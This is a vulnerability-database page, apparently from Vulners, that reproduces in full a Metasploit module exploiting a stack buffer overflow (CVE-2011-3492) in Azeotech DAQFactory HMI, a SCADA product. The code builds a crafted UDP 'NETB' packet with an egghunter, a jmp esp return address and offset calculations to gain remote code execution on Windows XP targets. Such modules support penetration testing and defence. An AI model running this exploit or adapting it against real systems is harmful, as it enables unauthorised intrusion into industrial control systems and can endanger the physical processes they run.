Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

DaqFactory HMI NETB Request Overflow

🗓️ 18 Sep 2011 02:45:55Reported by Luigi Auriemma, mr_me <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 36 Views

This module exploits a stack buffer overflow in Azeotech's DaqFactory product. Vulnerability triggered by sending a specially crafted 'NETB' request to port 20034. Exploitation may take a few seconds due to the use of egghunter. Discovered by researcher Luigi Auriemma

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2011-3492
18 Sep 201100:00
circl
Check Point Advisories		SCADA DaqFactory HMI NETB Request Overflow (CVE-2011-3492)
21 Mar 201300:00
checkpoint_advisories
CVE		CVE-2011-3492
16 Sep 201114:00
cve
Cvelist		CVE-2011-3492
16 Sep 201114:00
cvelist
ICS		AzeoTech DAQFactory Stack Overflow
24 Jun 201106:00
ics
NVD		CVE-2011-3492
16 Sep 201114:28
nvd
OpenVAS		Azeotech DAQFactory NETB Datagram Parsing Stack Buffer Overflow Vulnerability
7 Oct 201100:00
openvas
OpenVAS		Azeotech DAQFactory NETB Datagram Parsing Stack Buffer Overflow Vulnerability
7 Oct 201100:00
openvas
Packet Storm		DaqFactory HMI NETB Request Overflow
19 Sep 201100:00
packetstorm
Prion		Stack overflow
16 Sep 201114:28
prion
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DaqFactory HMI NETB Request Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Azeotech's DaqFactory
        product. The specific vulnerability is triggered when sending a specially crafted
        'NETB' request to port 20034. Exploitation of this vulnerability may take a few
        seconds due to the use of egghunter.  This vulnerability was one of the 14
        releases discovered by researcher Luigi Auriemma.
      },
      'Author'         =>
        [
          'Luigi Auriemma',  # Initial discovery, crash poc
          'mr_me <steventhomasseeley[at]gmail.com>',  # msf exploit
        ],
      'References'     =>
        [
          [ 'CVE', '2011-3492'],
          [ 'OSVDB', '75496'],
          [ 'URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'],
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-264-01']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Payload'        =>
        {
          'Space'    => 600,
          'BadChars' => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3',
            {
              'Ret' => 0x100B9EDF,  # jmp esp PEGRP32A.dll
              'Offset' => 636,
            }
          ],
        ],
      'DisclosureDate' => '2011-09-13',
      'DefaultTarget'  => 0))

    register_options(
      [
        # Required for EIP offset
        OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]),
        Opt::RPORT(20034)
      ])
  end

  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    eggoptions ={
      :checksum => false,
      :eggtag => 'scar',
    }

    # Correct the offset according to the 2nd IP (DHCP) length
    iplen = datastore['DHCP'].length
    offset = 93-iplen

    if offset >= 80
      pktoffset = offset - 80
      finaloffset = target['Offset']-pktoffset
    elsif offset <= 79
      pktoffset = 80 - offset
      finaloffset = target['Offset']+pktoffset
    end

    # springboard onto our unmodified payload
    p = Rex::Arch::X86.jmp(750) + payload.encoded
    hunter,egg = generate_egghunter(p, payload_badchars, eggoptions)

    sploit  = "NETB"  # NETB request overflow
    sploit << rand_text_alpha_upper(233)
    sploit << "\x00"  # part of the packet structure
    sploit << rand_text_alpha_upper(offset)  # include the offset for the DHCP address
    sploit << make_nops(2)
    sploit << hunter
    sploit << rand_text_alpha_upper(52-hunter.length-2)
    sploit << [target.ret].pack("V")
    sploit << rand_text_alpha_upper(12)
    sploit << Rex::Arch::X86.jmp_short(-70)
    sploit << egg
    # packetlen needs to be adjusted to a max of 0x400 as per advisory
    sploit << rand_text_alpha_upper(finaloffset-egg.length)

    # The use of rand_text_alpha_upper() ensures we always get the same length for the
    # first IP address.
    sploit[12,4] = rand_text_alpha_upper(4)

    udp_sock.put(sploit)

    handler
    disconnect_udp
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Feb 2022 23:22Current
7.3High risk
Vulners AI Score7.3
CVSS 210
EPSS0.78299
stack buffer overflowazeotech daqfactorynetb requestport 20034egghunterluigi auriemma
36